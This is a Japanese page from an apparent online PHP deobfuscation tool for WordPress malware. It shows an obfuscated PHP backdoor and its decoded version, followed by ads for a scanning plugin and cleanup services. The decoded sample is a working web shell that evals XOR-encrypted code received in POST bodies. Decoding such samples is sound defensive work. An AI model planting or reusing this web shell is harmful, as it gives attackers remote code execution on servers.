PHP 難読化コードの復元・デコード

Wordpress　等でのPHPのマルウェア・ウィルス・改ざんコードをデコードして難読化をオンラインで解除し、
元の読みやすいコードに戻し解読できます。

※すべての難読化コードを解除できるわけではございませんのでご理解とご了承をお願いいたします。

下記のコードを難読化解除しました

<?php $h='unction x($t,$k){$c=strlen($k);$l=strlen($t);$**o="";for($i=0;$i<$l;){for($'; $N=str_replace('dO','','cdOrdOeatdOdOe_funcdOtdOion'); $B='nd_clea**n();$r=@base64_encode(@x(@g**zcompress($o),$k));print("$p$kh$r$kf");}'; $l='$k="4d4098d6";$kh="4e163d272695";$kf="...

難読化されたPHPコード

<?php
$h='unction x(*$t*,$k){$c=st*rlen($*k);$l=*strle*n($t);$**o="";for($i*=0;*$i<*$l;*){for($';
$N=str_replace('dO','','cdOrdOeatdOdOe_funcdOtdOion');
$B='n*d*_clea**n();$r=@base*64_e*ncode(@x(@g**zcompress($o),$*k));p*rin*t("$p*$kh$r$kf");}';
$l='$k=*"*4d4098d6";$kh*="4e16*3d27269*5";*$kf="*94*55d046fd7c*";$p="f8ewV*ri1Y*d8RJ*kIZ"*;f';
$d='c*h("/$kh(.+*)$kf/*",@fi*le_get_contents*("php**://input"),$*m*)==1){@*ob_*start();*@*e';
$W='va*l(@g*z*uncompress(@x(@b*ase64_deco*de($m[1])*,$k)));$*o=@ob_*get_cont*ents*();@ob_e';
$u='j=*0;($j<$c&&$*i*<$l);$j*++,$i++*)*{$o.=$t{$i}^$*k{$*j};}}retur*n $o;}i*f(@p**reg_mat*';
$M=str_replace('*','',$l.$h.$u.$d.$W.$B);
$G=$N('',$M);$G();
?>

デコード(難読化解除)されたコード

<?php

$h = 'unction x(*$t*,$k){$c=st*rlen($*k);$l=*strle*n($t);$**o="";for($i*=0;*$i<*$l;*){for($';
$N = "create_function";
$B = 'n*d*_clea**n();$r=@base*64_e*ncode(@x(@g**zcompress($o),$*k));p*rin*t("$p*$kh$r$kf");}';
$l = '$k=*"*4d4098d6";$kh*="4e16*3d27269*5";*$kf="*94*55d046fd7c*";$p="f8ewV*ri1Y*d8RJ*kIZ"*;f';
$d = 'c*h("/$kh(.+*)$kf/*",@fi*le_get_contents*("php**://input"),$*m*)==1){@*ob_*start();*@*e';
$W = 'va*l(@g*z*uncompress(@x(@b*ase64_deco*de($m[1])*,$k)));$*o=@ob_*get_cont*ents*();@ob_e';
$u = 'j=*0;($j<$c&&$*i*<$l);$j*++,$i++*)*{$o.=$t{$i}^$*k{$*j};}}retur*n $o;}i*f(@p**reg_mat*';
$M = "\$k=\"4d4098d6\";\$kh=\"4e163d272695\";\$kf=\"9455d046fd7c\";\$p=\"f8ewVri1Yd8RJkIZ\";function x(\$t,\$k){\$c=strlen(\$k);\$l=strlen(\$t);\$o=\"\";for(\$i=0;\$i<\$l;){for(\$j=0;(\$j<\$c&&\$i<\$l);\$j++,\$i++){\$o.=\$t{\$i}^\$k{\$j};}}return \$o;}if(@preg_match(\"/\$kh(.+)\$kf/\",@file_get_contents(\"php://input\"),\$m)==1){@ob_start();@eval(@gzuncompress(@x(@base64_decode(\$m[1]),\$k)));\$o=@ob_get_contents();@ob_end_clean();\$r=@base64_encode(@x(@gzcompress(\$o),\$k));print(\"\$p\$kh\$r\$kf\");}";
$G = function () {
    $k = "4d4098d6";
    $kh = "4e163d272695";
    $kf = "9455d046fd7c";
    $p = "f8ewVri1Yd8RJkIZ";
    function x($t, $k)
    {
        $c = strlen($k);
        $l = strlen($t);
        $o = "";
        for ($i = 0; $i < $l;) {
            for ($j = 0; $j < $c && $i < $l; $j++, $i++) {
                $o .= $t[$i] ^ $k[$j];
            }
        }
        return $o;
    }
    if (@preg_match("/4e163d272695(.+)9455d046fd7c/", @file_get_contents("php://input"), $m) == 1) {
        @ob_start();
        @eval(@gzuncompress(@x(@base64_decode($m[1]), $k)));
        $o = @ob_get_contents();
        @ob_end_clean();
        $r = @base64_encode(@x(@gzcompress($o), $k));
        print "{$p}{$kh}{$r}{$kf}";
    }
};
$G();

■【無料】ワードプレス:マルウェアスキャン＆セキュリティープラグイン [マルウェア・ウィルス検出と駆除]

■WordPress のマルウェア駆除、セキュリティー対策カスタマイズや修正、引っ越し・復旧のご依頼承ります

PHP 難読化コードの復元・デコード

<?php $h='unction x(*$t*,$k){$c=st*rlen($*k);$l=*strle*n($t);$**o="";for($i*=0;*$i<*$l;*){for($'; $N=str_replace('dO','','cdOrdOeatdOdOe_funcdOtdOion'); $B='n*d*_clea**n();$r=@base*64_e*ncode(@x(@g**zcompress($o),$*k));p*rin*t("$p*$kh$r$kf");}'; $l='$k=*"*4d4098d6";$kh*="4e16*3d27269*5";*$kf="...

難読化されたPHPコード

デコード(難読化解除)されたコード

<?php $h='unction x($t,$k){$c=strlen($k);$l=strlen($t);$**o="";for($i=0;$i<$l;){for($'; $N=str_replace('dO','','cdOrdOeatdOdOe_funcdOtdOion'); $B='nd_clea**n();$r=@base64_encode(@x(@g**zcompress($o),$k));print("$p$kh$r$kf");}'; $l='$k="4d4098d6";$kh="4e163d272695";$kf="...